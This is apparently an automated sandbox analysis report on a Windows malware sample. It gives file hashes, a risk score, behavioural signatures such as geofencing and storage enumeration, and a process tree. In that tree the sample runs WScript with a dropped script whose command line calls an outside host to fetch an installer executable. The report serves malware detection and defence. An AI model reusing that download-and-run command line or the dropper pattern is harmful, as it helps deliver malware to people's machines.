Overview

overview

8

Static

static

ad35ecbd8e...5b.exe

windows7-x64

8

ad35ecbd8e...5b.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    151s
  • max time network
    195s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/11/2022, 04:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ad35ecbd8e2157391bf105211e8e2afbe5547f59ce481c0ebbab93457f33835b.exe

  • Size

    184KB

  • MD5

    8f9c95d5257cff58ab740dd3415dff7f

  • SHA1

    e17acc7ec421c6c4b16bb051ea3dcd1795e05cd6

  • SHA256

    ad35ecbd8e2157391bf105211e8e2afbe5547f59ce481c0ebbab93457f33835b

  • SHA512

    b20f47589073cf7909c7e19c3612e603f53188332af4390c196bcba6272f47618ca70a0d7c1133b3e5b5d14b4de5ab1142df55047fee662ab1aee9bbd0a95c6a

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3z:/7BSH8zUB+nGESaaRvoB7FJNndnq

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ad35ecbd8e2157391bf105211e8e2afbe5547f59ce481c0ebbab93457f33835b.exe
    "C:\Users\Admin\AppData\Local\Temp\ad35ecbd8e2157391bf105211e8e2afbe5547f59ce481c0ebbab93457f33835b.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A6D.js" http://www.djapp.info/?domain=qQKzrVboSo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A6D.exe
      2⤵
      • Blocklisted process makes network request
      PID:3508
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A6D.js" http://www.djapp.info/?domain=qQKzrVboSo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A6D.exe
      2⤵
      • Blocklisted process makes network request
      PID:4880
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A6D.js" http://www.djapp.info/?domain=qQKzrVboSo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A6D.exe
      2⤵
      • Blocklisted process makes network request
      PID:4748

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\fuf1A6D.js
    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

    Download Submit